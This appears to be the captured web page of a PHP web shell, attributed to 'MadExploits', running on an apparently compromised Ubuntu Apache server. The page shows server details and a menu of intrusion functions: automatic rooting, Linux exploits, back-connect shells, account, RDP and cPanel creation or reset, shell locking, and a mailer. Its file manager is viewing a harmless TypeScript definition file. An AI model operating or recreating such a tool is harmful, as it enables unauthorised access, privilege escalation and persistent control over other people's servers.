Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
supports-color /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.22
KB
-rw-r--r--
package.json
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for supports-color 8.1 // Project: https://github.com/chalk/supports-color // Definitions by: Melvin Groenhoff <https://github.com/mgroenhoff> // Matt Traynham <https://github.com/mtraynham> // Piotr Błażejewicz <https://github.com/peterblazejewicz> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped export namespace supportsColor { interface Level { level: number; hasBasic: boolean; has256: boolean; has16m: boolean; } interface Options { /** * By default it is `true`, which instructs `supportsColor()` to sniff `process.argv` * for the multitude of `--color` flags (see _Info_ below). * If `false`, then `process.argv` is not considered when determining color support. * @default true */ sniffFlags?: boolean | undefined; isTTY?: boolean | undefined; } type SupportsColor = false | Level; } export function supportsColor( stream: { isTTY?: boolean | undefined; }, options?: supportsColor.Options, ): supportsColor.SupportsColor; export const stdout: supportsColor.SupportsColor; export const stderr: supportsColor.SupportsColor;
Close